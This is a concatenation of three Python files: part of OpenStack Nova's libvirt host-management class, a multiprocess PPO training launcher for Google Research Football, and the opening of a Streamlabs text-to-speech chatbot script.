self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
            # Let's pretend both of these mean success
if ex.get_error_code() in (libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job info: %s", ex)
raise
return cls(
type=info[0],
time_elapsed=info[1],
time_remaining=info[2],
data_total=info[3],
data_processed=info[4],
data_remaining=info[5],
memory_total=info[6],
memory_processed=info[7],
memory_remaining=info[8],
disk_total=info[9],
disk_processed=info[10],
disk_remaining=info[11])
@classmethod
def for_domain(cls, dom):
'''Get job info for the domain
Query the libvirt job info for the domain (ie progress
of migration, or snapshot operation)
Returns: a DomainJobInfo instance
'''
if cls._have_job_stats:
try:
stats = dom.jobStats()
return cls(**stats)
except libvirt.libvirtError as ex:
if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
# Remote libvirt doesn't support new API
LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
elif ex.get_error_code() in (
libvirt.VIR_ERR_NO_DOMAIN,
libvirt.VIR_ERR_OPERATION_INVALID):
# Transient guest finished migration, so it has gone
# away completely
LOG.debug("Domain has shutdown/gone away: %s", ex)
return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
else:
LOG.debug("Failed to get job stats: %s", ex)
raise
except AttributeError as ex:
# Local python binding doesn't support new API
LOG.debug("Missing local virDomainGetJobStats: %s", ex)
cls._have_job_stats = False
return cls._get_job_stats_compat(dom)
else:
return cls._get_job_stats_compat(dom)
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._conn_event_handler = conn_event_handler
self._lifecycle_event_handler = lifecycle_event_handler
self._skip_list_all_domains = False
self._caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
@staticmethod
def _connect(uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
# tpool.proxy_call creates a native thread. Due to limitations
# with eventlet locking we cannot use the logging API inside
# the called function.
return tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
libvirt.openAuth, uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
if self._conn_event_handler is not None:
self._conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
if event.uuid in self._events_delayed.keys():
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
wrapped_conn = None
try:
wrapped_conn = self._connect(self._uri, self._read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
disable_reason = None
if not wrapped_conn:
disable_reason = 'Failed to connect to libvirt'
if self._conn_event_handler is not None:
self._conn_event_handler(bool(wrapped_conn), disable_reason)
self._wrapped_conn = wrapped_conn
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except (TypeError, AttributeError) as e:
# NOTE: The registerCloseCallback of python-libvirt 1.0.1+
# is defined with 3 arguments, and the above registerClose-
# Callback succeeds. However, the one of python-libvirt 1.0.0
# is defined with 4 arguments and TypeError happens here.
# Then python-libvirt 0.9 does not define a method register-
# CloseCallback.
LOG.debug("The version of python-libvirt does not support "
"registerCloseCallback or is too old: %s", e)
except libvirt.libvirtError as e:
LOG.warn(_LW("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self._uri, 'error': e})
return wrapped_conn
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
wrapped_conn = self._get_new_connection()
return wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
rpc.get_notifier('compute').error(nova_context.get_admin_context(),
'compute.libvirt.error',
payload)
raise exception.HypervisorUnavailable(host=CONF.host)
return conn
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)
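    # Illustrative use (sketch; the version tuple below is an arbitrary example):
    #   if host.has_min_version(lv_ver=(1, 2, 0), hv_type=HV_DRIVER_QEMU):
    #       ...take the newer code path...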
# TODO(sahid): needs to be private
def get_domain(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
Attempt to lookup the libvirt domain objects
corresponding to the Nova instance, based on
its name. If not found it will raise an
exception.InstanceNotFound exception. On other
errors, it will raise an exception.NovaException
exception.
:returns: a libvirt.Domain object
"""
return self._get_domain_by_name(instance.name)
def get_guest(self, instance):
"""Retrieve libvirt domain object for an instance.
:param instance: an nova.objects.Instance object
:returns: a nova.virt.libvirt.Guest object
"""
return libvirt_guest.Guest(
self.get_domain(instance))
def _get_domain_by_id(self, instance_id):
"""Retrieve libvirt domain object given an instance id.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByID(instance_id)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_id)
msg = (_("Error from libvirt while looking up %(instance_id)s: "
"[Error Code %(error_code)s] %(ex)s")
% {'instance_id': instance_id,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _get_domain_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
conn = self.get_connection()
return conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = (_('Error from libvirt while looking up %(instance_name)s: '
'[Error Code %(error_code)s] %(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
raise exception.NovaException(msg)
def _list_instance_domains_fast(self, only_running=True):
# The modern (>= 0.9.13) fast way - 1 single API call for all domains
flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
if not only_running:
flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
return self.get_connection().listAllDomains(flags)
def _list_instance_domains_slow(self, only_running=True):
# The legacy (< 0.9.13) slow way - O(n) API call for n domains
uuids = []
doms = []
# Redundant numOfDomains check is for libvirt bz #836647
if self.get_connection().numOfDomains() > 0:
for id in self.get_connection().listDomainsID():
try:
dom = self._get_domain_by_id(id)
doms.append(dom)
uuids.append(dom.UUIDString())
except exception.InstanceNotFound:
continue
if only_running:
return doms
for name in self.get_connection().listDefinedDomains():
try:
dom = self._get_domain_by_name(name)
if dom.UUIDString() not in uuids:
doms.append(dom)
except exception.InstanceNotFound:
continue
return doms
def list_guests(self, only_running=True, only_guests=True):
"""Get a list of Guest objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
See method "list_instance_domains" for more information.
:returns: list of Guest objects
"""
return [libvirt_guest.Guest(dom) for dom in self.list_instance_domains(
only_running=only_running, only_guests=only_guests)]
def list_instance_domains(self, only_running=True, only_guests=True):
"""Get a list of libvirt.Domain objects for nova instances
:param only_running: True to only return running instances
:param only_guests: True to filter out any host domain (eg Dom-0)
Query libvirt to a get a list of all libvirt.Domain objects
that correspond to nova instances. If the only_running parameter
is true this list will only include active domains, otherwise
inactive domains will be included too. If the only_guests parameter
is true the list will have any "host" domain (aka Xen Domain-0)
filtered out.
:returns: list of libvirt.Domain objects
"""
if not self._skip_list_all_domains:
try:
alldoms = self._list_instance_domains_fast(only_running)
except (libvirt.libvirtError, AttributeError) as ex:
LOG.info(_LI("Unable to use bulk domain list APIs, "
"falling back to slow code path: %(ex)s"),
{'ex': ex})
self._skip_list_all_domains = True
if self._skip_list_all_domains:
# Old libvirt, or a libvirt driver which doesn't
# implement the new API
alldoms = self._list_instance_domains_slow(only_running)
doms = []
for dom in alldoms:
if only_guests and dom.ID() == 0:
continue
doms.append(dom)
return doms
def get_online_cpus(self):
"""Get the set of CPUs that are online on the host
Method is only used by NUMA code paths which check on
libvirt version >= 1.0.4. getCPUMap() was introduced in
libvirt 1.0.0.
:returns: set of online CPUs, raises libvirtError on error
"""
(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES')
and self._caps.host.cpu.model is not None):
try:
features = self.get_connection().baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warn(_LW("URI %(uri)s does not support full set"
" of host capabilities: %(error)s"),
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error(_LE('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'),
{'old': self._hostname,
'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.NovaException(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s' % xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a secret with XML: %s'), xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._get_hardware_info()[1]
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt.virt_type == 'xen':
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info(self)[2])
except libvirt.libvirtError as e:
LOG.warn(_LW("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s"),
{"uuid": guest.uuid, "ex": e})
continue
# skip dom0
if guest.id != 0:
used += dom_mem
else:
                    # the memory reported by dom0 may be greater than
                    # what it is actually using
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used // units.Ki
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail // units.Ki
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: a virDomain instance
"""
return self.get_connection().defineXML(xml)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
return self.get_connection().listDevices("pci", flags)
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
|
kw_train.py
|
import gfootball.env as football_env
import time, os
import json
import pprint
import importlib
from datetime import datetime
import numpy as np
import torch
import torch.multiprocessing as mp
#
from actor import *
from learner import *
from evaluator import evaluator
################################################################################
def save_args(arg_dict):
os.makedirs(arg_dict['log_dir'])
with open(arg_dict['log_dir'] + '/args.json', 'w') as out:
        json.dump(arg_dict, out, indent = 4)
################################################################################
def main(arg_dict):
os.environ['OPENBLAS_NUM_THREADS'] = '1' #???
cur_time = datetime.now()
arg_dict['log_dir'] = 'logs/' + cur_time.strftime('[%m-%d]%H.%M.%S')
save_args(arg_dict)
#
np.set_printoptions(precision = 3)
np.set_printoptions(suppress = True)
pp = pprint.PrettyPrinter(indent = 4)
torch.set_num_threads(1) #???
#
fe = importlib.import_module('encoders.' + arg_dict['encoder'])
fe = fe.FeatureEncoder()
arg_dict['feature_dims'] = fe.get_feature_dims()
#
model = importlib.import_module('models.' + arg_dict['model'])
    cpu_device = torch.device('cpu')  # checkpoints are loaded onto the CPU here
center_model = model.Model(arg_dict)
#
if arg_dict['trained_model_path']:
checkpoint = torch.load(arg_dict['trained_model_path'], map_location = cpu_device)
optimization_step = checkpoint['optimization_step']
center_model.load_state_dict(checkpoint['model_state_dict'])
center_model.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
arg_dict['optimization_step'] = optimization_step
        print('Trained model', arg_dict['trained_model_path'], 'successfully loaded')
else:
optimization_step = 0
model_dict = {
'optimization_step': optimization_step,
'model_state_dict': center_model.state_dict(),
'optimizer_state_dict': center_model.optimizer.state_dict(),
}
path = arg_dict['log_dir'] + f'/model_{optimization_step}.tar'
torch.save(model_dict, path)
center_model.share_memory()
data_queue = mp.Queue()
signal_queue = mp.Queue()
summary_queue = mp.Queue()
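    # Presumed roles (inferred from how actor/learner/evaluator use these queues):
    #   data_queue    - rollouts from actor processes to the learner
    #   signal_queue  - learner -> actors/evaluator synchronization signals
    #   summary_queue - per-episode stats for logging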
processes = []
p = mp.Process(target = learner, args = (center_model, data_queue, signal_queue, summary_queue, arg_dict))
p.start()
processes.append(p)
for rank in range(arg_dict['num_processes']):
if arg_dict['env'] == '11_vs_11_kaggle':
p = mp.Process(target = actor_self, args = (rank, center_model, data_queue, signal_queue, summary_queue, arg_dict))
else:
p = mp.Process(target = actor, args = (rank, center_model, data_queue, signal_queue, summary_queue, arg_dict))
p.start()
processes.append(p)
#
if 'env_evaluation' in arg_dict:
p = mp.Process(target = evaluator, args = (center_model, signal_queue, summary_queue, arg_dict))
p.start()
processes.append(p)
#
for p in processes:
p.join()
################################################################################
if __name__ == '__main__':
arg_dict = {
'env': '11_vs_11_kaggle',
# '11_vs_11_kaggle' : environment used for self-play training
# '11_vs_11_stochastic' : environment used for training against fixed opponent(rule-based AI)
'env_evaluation': '11_vs_11_hard_stochastic', # for evaluation of self-play trained agent (like validation set in Supervised Learning)
'trained_model_path': None,
#
'summary_game_window': 10,
'model_save_interval': 300000,
'batch_size': 32,
'buffer_size': 6,
'rollout_len': 30,
'lstm_size': 256,
#algo
'gamma': 0.993,
'lmbda': 0.96,
'k_epoch': 3,
'entropy_coef': 0.0001,
'grad_clip': 3.0,
'eps_clip': 0.1,
#
'encoder': 'encoder_basic',
'rewarder': 'rewarder_basic',
'model': 'conv1d',
'algorithm': 'ppo'
}
main(arg_dict)
|
TTSAlertsAndChat_StreamlabsSystem.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" Text-To-Speech for Alerts and Chat Messages
1.1.4
Fixed bug adding unicode characters to banned words list
Added setting for ban messages
Added ability to ban users for a time
1.1.3
Fixed bug where banned words showed on overlay
1.1.2
Support ascii characters in overlay
1.1.1
Control overlay position/message, ban users, and set a character limit
1.1.0
Added $tts parameter, text-to-speech overlay, fixed twitch sub
1.0.0
Initial public release
"""
#---------------------------------------
# Script Import Libraries
#---------------------------------------
import os
import codecs
import json
from collections import OrderedDict
import time
import re
import threading
import clr
clr.AddReference("IronPython.Modules.dll")
clr.AddReference('System.Speech')
clr.AddReferenceToFileAndPath(os.path.join(os.path.dirname(os.path.realpath(__file__)), "StreamlabsEventReceiver.dll"))
from System.Speech.Synthesis import SpeechSynthesizer
from StreamlabsEventReceiver import StreamlabsEventClient
#---------------------------------------
# Script Information
#---------------------------------------
ScriptName = "TTS Alerts and Chat"
Website = "https://www.twitch.tv/kruiser8"
Description = "Text-to-speech for streamlabs alerts and chat messages."
Creator = "Kruiser8"
Version = "1.1.4"
#---------------------------------------
# Script Variables
#---------------------------------------
# Socket Receiver
EventReceiver = None
# Settings file location
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
# UI Config file location
UIConfigFile = os.path.join(os.path.dirname(__file__), "UI_Config.json")
# Banned user file
BannedUserFile = os.path.join(os.path.dirname(__file__), "users.txt")
# Banned word file
BannedWordFile = os.path.join(os.path.dirname(__file__), "banned.txt")
# TTS Parser
RegTTS = re.compile(r"\$tts\((?P<message>.*?)\)")
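# e.g. "Check this out $tts(hello chat)" -> the "message" group captures "hello chat"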
SubPlanMap = {
"Prime": "Prime",
"1000": "Tier 1",
"2000": "Tier 2",
"3000": "Tier 3"
}
#---------------------------------------
# Script Classes
#---------------------------------------
class Settings(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, settingsfile=None):
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
except:
self.VoiceName = ""
self.Volume = 80
self.Rate = 0
self.MaxCharacters = 0
self.MaxCharacterMessage = "{user}, your message was too long for text-to-speech."
self.TTSCommand = "!tts"
self.TTSCommandPermission = "Caster"
self.TTSCommandPermissionInfo = ""
self.TTSCommandCost = 500
self.TTSCommandMessage = "{user} says, {message}"
self.TTSCommandUsage = "Stream Chat"
self.TTSCommandUsageReply = False
self.TTSCommandUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSUseCD = False
self.TTSCasterCD = True
self.TTSCooldown = 0
self.TTSOnCooldown = "{user} the command is still on cooldown for {cooldown} seconds!"
self.TTSUserCooldown = 10
self.TTSOnUserCooldown = "{user} the command is still on user cooldown for {cooldown} seconds!"
self.TTSAllChat = False
self.TTSAllChatExcludeCommands = True
self.TTSAllChatMessage = "{user} says, {message}"
self.TTSAllChatUsage = "Stream Chat"
self.TTSAllChatUsageReply = False
self.TTSAllChatUsageReplyMessage = "{user} you can only use this command from {usage}!"
self.TTSOverlayExcludeAlerts = True
self.TTSOverlayMessage = "{user} says, {message}"
self.TTSOverlayTime = 8
self.TTSOverlayFontColor = "rgba(255,255,255,1.0)"
self.TTSOverlayUseFontOutline = False
self.TTSOverlayFontOutline = "rgba(0,0,0,0)"
self.TTSOverlayUseFontShadow = True
self.TTSOverlayFontShadow = "rgba(0,0,0,1.0)"
